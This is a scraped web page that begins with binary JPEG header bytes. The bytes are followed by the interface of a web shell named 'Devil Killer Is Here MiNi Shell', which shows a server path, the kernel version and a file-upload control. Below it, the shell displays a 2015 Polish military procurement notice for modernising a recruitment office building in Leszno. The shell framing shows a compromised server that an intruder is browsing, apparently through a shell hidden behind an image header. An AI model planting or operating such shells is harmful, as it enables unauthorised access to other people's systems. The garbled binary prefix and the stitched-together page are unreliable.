JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150806/117423-N-2015.html

<p class="kh_header"><b>Poznań: Opracowanie Programu Inwestycji i Dokumentacji Projektowej, nadzór autorski wraz z odpowiedziami na pytania dla zadania: Modernizacja budynku biurowo-sztabowego nr 2 dla potrzeb Wojskowej Komendy Uzupełnień w Lesznie</b><br>
<b>Numer ogłoszenia: 117423 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowy Zarząd Infrastruktury w Poznaniu , ul. Kościuszki 92/98, 60-967 Poznań, woj. wielkopolskie, tel. 061 8573323, faks 061 8572727, 8572489.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzipoznan.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Programu Inwestycji i Dokumentacji Projektowej, nadzór autorski wraz z odpowiedziami na pytania dla zadania: Modernizacja budynku biurowo-sztabowego nr 2 dla potrzeb Wojskowej Komendy Uzupełnień w Lesznie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie Programu Inwestycji, Dokumentacji Projektowej, nadzór autorski wraz z odpowiedziami na pytania do przetargu dla zadania 55056 LESZNO WKU Modernizacja budynku biurowo - sztabowego nr 2 w kompleksie 5449 dla potrzeb Wojskowej Komendy Uzupełnień w Lesznie.

Szczegółowy opis zakresu robót ww. zadania inwestycyjnego podlegający poniższemu opracowaniu zawierają Minimalne Wojskowe Wymagania Organizacyjno - Użytkowe (MWWO-U) wraz z załącznikami. Zaprojektowaniu podlega między innymi:
1.Dostosowanie obiektu do aktualnych wymagań zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. (Dz.U. nr 75 poz. 690 z późniejszymi zmianami) w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie.
2.Architektura i konstrukcja: wykonanie nowej elewacji wraz z termoizolacją, wykonanie nowego poszycia dachu (włącznie z termoizolacją, opierzeniem, rynnami i instalacją odgromową), wymiana stolarki okiennej i drzwiowej (wewnętrznej i zewnętrznej - wraz z uwzględnieniem specjalnych wymagań w niektórych pomieszczeniach), wykonanie nowych tynków wewnętrznych z malowaniem, wykonanie nowego pokrycia podłogowego (z uwzględnieniem przepisów BHP), ponadto  wykonanie nowych sanitariatów, dostosowanie wejścia do budynku oraz całego parteru dla osób niepełnosprawnych, wydzielenie klatek schodowych z przeznaczeniem na wyjście ewakuacyjne;
3.Instalacje elektryczne: demontaż istniejącej instalacji elektrycznej, wykonanie nowych instalacji elektrycznych: oświetlenie awaryjne (ewakuacyjne), gniazda wtyczkowe 230V~, ponadto wykonanie instalacji ochrony przed elektrycznością statyczną i przeciwprzepięciowej, uziemienia, odgromowej, oświetlenia miejscowego oraz dedykowanych systemów zasilania gwarantowanego UPS do systemów alarmowych lub dobór nowego agregatu prądotwórczego wraz z automatycznym załączaniem/wyłączaniem, który powinien obejmować wszystkie zainstalowane systemy, modernizacja przyłącza elektrycznego. 
4.Instalacje sanitarne (montaż klimatyzacji w niektórych pomieszczeniach, montaż urządzeń filtro-wentylacyjnych w piwnicy, modernizację przyłącza oraz wewnętrznej instalacji c.o., modernizację przyłącza wodno - kanalizacyjnego wraz z wymianą wewnętrznej instalacji wodno - kanalizacyjnej oraz ppoż (hydranty wewnętrzne);
5.Instalacje teletechniczne montaż systemu sygnalizacji wykrywania pożaru umożliwiającą automatyczne powiadomienie firmy realizującej zadania w zakresie ochrony przeciwpożarowej, ponadto: montaż systemu kontroli dostępu, montaż systemu sygnalizacji włamania i napadu, montaż komputerowych sieci logicznych (jawnej oraz niejawnej) montaż systemu kamer wewnętrznych oraz zewnętrznych telewizji przemysłowej oraz czujników ruchu) - systemy alarmowe klasy SA4; oraz wykonanie w budynku instalacji RTV i doprowadzenie sygnału radiowo - telewizyjnego (do wybranych pomieszczeń)
6.Aranżacja wnętrz (wszystkie pomieszczenia kancelaryjne oraz wyszczególnione  w MWWO-U wyposażyć w systemowe meble biurowe (z uwzględnieniem wymagań dotyczących BHP), okna w całym budynku wyposażyć w wewnętrzne rolety.
MWWO-U stanowić będą załącznik do SIWZ.
 W ramach opracowania dokumentacji Wykonawca zobowiązany jest wykonać:
1.Inwentaryzację obiektu/terenu w zakresie niezbędnym do projektowania.
2.Program Inwestycji (PI) wykonany zgodnie z § 6 Rozporządzenia Rady Ministrów z dnia 2 grudnia 2010 r. w sprawie szczegółowego sposobu finansowania inwestycji  z budżetu państwa, zawierający między innymi dane o planowanym zakresie rzeczowym i okresie realizacji inwestycji, a także planowany łączny koszt inwestycji - wzór PI stanowi załącznik do specyfikacji. Program należy wykonać wykorzystując zatwierdzone MWWO-U opracowane przez Użytkownika obiektu. Ponadto musi on zawierać uzasadnienie ekonomiczne realizacji zadania i opis planowanego efektu rzeczowego.
3.Dla opracowanego Programu Inwestycji należy uzyskać opinie:
-  Użytkownika - WKU Leszno,
-  Jednostki nadrzędnej Użytkownika - Wojewódzkiego Sztabu Wojskowego              w Poznaniu,
-  JW 1156 (pełniącą funkcję WOG),
-  Regionu Wsparcia Teleinformatycznego we Wrocławiu,
-  Delegatury Wojskowej Ochrony Przeciwpożarowej w Poznaniu,
- Delegatury Wojskowej Inspekcji Gospodarki Energetycznej we Wrocławiu,
- Wojskowego Ośrodka Medycyny Prewencyjnej w Bydgoszczy,
-  Wojskowego Zarządu Infrastruktury w Poznaniu.
4.Po zatwierdzeniu przez Zamawiającego Programu Inwestycji, Wykonawca przystąpi do opracowania Dokumentacji Projektowo - Kosztorysowej dla zakresu rzeczowego zawartego w zatwierdzonym programie:
a.projekt budowlany sporządzony zgodnie z Rozporządzeniem Ministra Transportu   i Gospodarki Morskiej z dn. 25.04.2012 w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U z dn. 27.04.2012 poz. 462).
b.projekty wykonawcze dla każdej z branż oddzielnie.
5.Wykonaną dokumentację należy uzgodnić z:
- Użytkownikiem - WKU Leszno,
- JW 1156 (pełniącą funkcję WOG),
- Wojskowym Zarządem Infrastruktury w Poznaniu.
6.Sporządzenie kosztorysów inwestorskich zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego (Dz. U nr 130 poz. 1389 z 2004r).
7.Sporządzenie przedmiarów robót wraz z wykazem materiałów z rozbiórki  i demontażu podlegających utylizacji.
8.Sporządzenie Zestawienia Kosztów Zadania zgodnie z załącznikiem nr .., wraz  z analizą porównawczą wskaźników jednostkowych kosztów, obliczonych na podstawie ZKZ z wskaźnikami jednostkowymi kosztów uzyskanymi na realizowanych wcześniej przez WZI lub wskaźnikami określonymi w publikacjach.
9.Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia  2 września 2004               w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
10.	Informacja do sporządzenia planu BIOZ.
11.Sporządzenie scenariusza pożarowego wraz z planem rozmieszczenia sprzętu ppoż. i oznaczeniem dróg ewakuacyjnych.
12.Sporządzenie wykazu pierwszego wyposażenia wraz z aranżacją wnętrz.
13.Raport oddziaływania na środowisko lub kartę informacyjną - jeśli zaistnieje taka konieczność.
14.Charakterystykę energetyczną budynku.
15.Aktualizacje podkładów geodezyjnych dla celów projektowych.
16.Uzyskanie w imieniu zamawiającego decyzji administracyjnych niezbędnych dla realizacji zadania oraz opracowanie dokumentów niezbędnych do ich uzyskania, jeżeli zaistnieje taka konieczność.
17.Program Inwestycji i Dokumentacja dla ww. zadania dotyczyć będzie obiektu wojskowego - w związku z tym Oferent przystępując do przetargu musi spełnić wymogi ustawy z dnia 05 sierpnia 2010r. o ochronie informacji niejawnych.
18.Udzielenie odpowiedzi na pytania do przetargu i prowadzenie nadzoru autorskiego podczas prowadzenia robót budowlanych.
19.Wymogi formalne dla dokumentacji technicznej i projektowej:
Dokumentacja techniczna i projektowa będąca przedmiotem zamówienia musi spełniać wymogi określone: 
- ustawą z dnia 7 lipca 1994 r. Prawo budowlane wraz ze zmianami;
- ustawą z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne wraz ze zmianami;
- ustawą z dnia 14.07.1983 r. O narodowym zasobie archiwalnym                          i archiwach - tekst jednolity z dnia 29.08.2002 r. - tekst jednolity z dnia 16.05.2006 r. - wraz ze zmianami;
- Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego;
- Rozporządzeniem Ministra Rozwoju Regionalnego i Budownictwa z dnia 2 kwietnia 2001 r. w sprawie geodezyjnej ewidencji sieci uzbrojenia terenu oraz zespołów uzgadniania dokumentacji projektowej;
- standardami technicznymi w geodezji - instrukcjami i wytycznymi obowiązującymi w geodezji na podstawie rozporządzenia Ministra Spraw Wewnętrznych                        i Administracji z dnia 24 marca 1999 r.;
- Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 02.11.2006 r. w sprawie wymagań technicznych formatów zapisu  i informatycznych nośników danych na których utrwalono materiały archiwalne i przekazywane do archiwów państwowych;

Wymogi szczegółowe:
- dokumentacja techniczna i projektowa musi być trwale oprawiona oraz zabezpieczona przed zdekompletowaniem (oprawa książkowa);
- oprawa (okładka) powinna być wykonana z trwałego i sztywnego materiału (karton, tektura o gr. min. 1 mm) w formacie A4. Sposób oprawy powinien pozwalać na swobodne przeglądanie zawartości dokumentacji. Kolor oprawy (okładki) - szary lub biały;
- górna zewnętrzna strona oprawy przeznaczona jest na nanoszenie oznaczeń kancelaryjnych, dlatego powinna być pozostawiona czysta, dolna część zewnętrznej strony oprawy przeznaczona jest na umieszczenie metryki informacyjnej - legendy opracowania;
- wszystkie zapisane strony dokumentacji muszą zawierać numerację, 
a poszczególne tomy dokumentacji  - numery egzemplarza;
- każde opracowanie na pierwszej stronie powinno zawierać spis treści zgodny          z zawartością;
- magnetyczne, optyczne nośniki informacji załączone do dokumentacji należy oznaczyć zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 02.11.2006 r. w sprawie wymagań technicznych formatów zapisu i informatycznych nośników danych na których utrwalono materiały archiwalne i przekazane do archiwów państwowych;
- dokumentację niejawną, niejawne opracowania geodezyjno - kartograficzne należy oznaczyć zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 22 grudnia 2011 r. w sprawie sposobu oznaczania materiałów i umieszczania na nich klauzul tajności;
- dokumentacja projektowa powinna dodatkowo spełniać następujące warunki: grubość teczek dokumentacji nie może przekraczać 5 cm oraz wszelkie metalowe części (spinacze i inne) muszą być usunięte..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy, zamówień uzupełniających  stanowiących nie więcej niż  20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 255.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający będzie wymagał wniesienia wadium od Wykonawców, którzy zostaną zaproszeni do składania ofert. Wadium wynosi 6 000,00 zł (sześć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku Wykonawcy wykażą, że spełniają wymogi ustawy o ochronie informacji niejawnych z dnia 5 sierpnia 2010 r. (Dz. U. z 2010r. Nr 182, poz.1228) w zakresie ochrony informacji niejawnych oznaczonych klauzulą ZASTRZEŻONE, w tym:
1.Wykonawca musi zatrudniać:
- przeszkolonego przez ABW lub SKW pełnomocnika ds. ochrony informacji  niejawnych,
- przeszkolonego przez ABW lub SKW administratora systemu teleinformatycznego,
- przeszkolonego przez ABW lub SKW inspektora bezpieczeństwa teleinformatycznego,
   - musi posiadać obsługę kancelaryjną dokumentów niejawnych oznaczonych  klauzulą ZASTRZEŻONE.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że zaprojektował (w okresie ostatnich 3 lat przed dniem składania wniosków o dopuszczenie  do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przebudowę lub remont dwóch budynków        o kubaturze minimum 7 000m3 każdy w zakresie konstrukcji, instalacji elektrycznych, wentylacji, telekomunikacji oraz systemów alarmowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia ww. warunku Wykonawcy wykażą, że:
1)dysponują osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia takich osób: 
a.posiadających uprawnienia budowlane do projektowania bez ograniczeń w nw. specjalnościach: 
architektonicznej
konstrukcyjno - budowlanej,
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych
instalacyjnej w zakresie sieci, instalacji  elektrycznych i urządzeń elektroenergetycznych,
instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych
b.posiadających uprawnienia do:
geodezyjnych pomiarów  sytuacyjno - wysokościowych, realizacyjnych 
i inwentaryzacyjnych,
osoby do projektowania systemów alarmowych i kontroli dostępu  z  zaświadczeniem Komendanta Wojewódzkiego Policji o wpisie  na   listę kwalifikowanych pracowników  zabezpieczenia technicznego oraz ukończonym kursem projektowania tych systemów do klas SA1 - SA4.
2)dysponują odpowiednim potencjałem technicznym, w tym że: 
a.Wykonawca posiada akredytowany system teleinformatyczny do przetwarzania informacji niejawnych o klauzuli ZASTRZEŻONE (w tym obsługi geodezyjnej).
Pracownicy odpowiedzialni za realizację zadania, geodeta  oraz osoby przewidziane do montażu SSWiN muszą posiadać poświadczenia bezpieczeństwa upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą ZASTRZEŻONE lub pisemne upoważnienie kierownika jednostki organizacyjnej (KJO) do dostępu do informacji niejawnych oraz zaświadczenia o odbyciu szkolenia z zakresu ochrony informacji niejawnych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia ww. warunku Wykonawcy wykażą, że:
1)dysponują osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia takich osób: 
a.posiadających uprawnienia budowlane do projektowania bez ograniczeń w nw. specjalnościach: 
architektonicznej
konstrukcyjno - budowlanej,
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych
instalacyjnej w zakresie sieci, instalacji  elektrycznych i urządzeń elektroenergetycznych,
instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych
b.posiadających uprawnienia do:
geodezyjnych pomiarów  sytuacyjno - wysokościowych, realizacyjnych 
i inwentaryzacyjnych,
osoby do projektowania systemów alarmowych i kontroli dostępu  z  zaświadczeniem Komendanta Wojewódzkiego Policji o wpisie  na   listę kwalifikowanych pracowników  zabezpieczenia technicznego oraz ukończonym kursem projektowania tych systemów do klas SA1 - SA4.
2)dysponują odpowiednim potencjałem technicznym, w tym że: 
a.Wykonawca posiada akredytowany system teleinformatyczny do przetwarzania informacji niejawnych o klauzuli ZASTRZEŻONE (w tym obsługi geodezyjnej).
Pracownicy odpowiedzialni za realizację zadania, geodeta  oraz osoby przewidziane do montażu SSWiN muszą posiadać poświadczenia bezpieczeństwa upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą ZASTRZEŻONE lub pisemne upoważnienie kierownika jednostki organizacyjnej (KJO) do dostępu do informacji niejawnych oraz zaświadczenia o odbyciu szkolenia z zakresu ochrony informacji niejawnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania wniosków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
